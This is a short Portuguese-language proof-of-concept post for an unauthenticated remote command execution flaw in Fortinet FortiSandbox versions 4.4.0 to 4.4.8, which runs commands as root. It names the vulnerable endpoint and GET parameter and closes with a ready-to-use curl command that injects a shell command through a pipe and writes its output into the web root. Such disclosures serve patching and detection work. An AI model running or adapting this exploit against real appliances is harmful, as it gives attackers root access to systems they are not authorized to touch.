
PoC for Unauthenticated RCE in FortiSandbox via CVE-2026-39808
Em novembro de 2025, uma vulnerabilidade crítica foi descoberta no FortiSandbox da Fortinet que permitia a um atacante não autenticado executar comandos no sistema operacional subjacente como root. A vulnerabilidade foi corrigida e finalmente divulgada em abril de 2026.
Esta vulnerabilidade afeta as versões 4.4.0 a 4.4.8 do FortiSandbox.
Leia o comunicado completo aqui.
A vulnerabilidade afeta o endpoint /fortisandbox/job-detail/tracer-behavior. Comandos do sistema operacional podem ser injetados usando o símbolo de pipe (|) no parâmetro GET jid.
No exemplo acima, a saída foi redirecionada para um arquivo na raiz web, para que pudesse ser recuperada posteriormente.
Um simples comando curl é suficiente para obter RCE como root sem autenticação prévia:
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"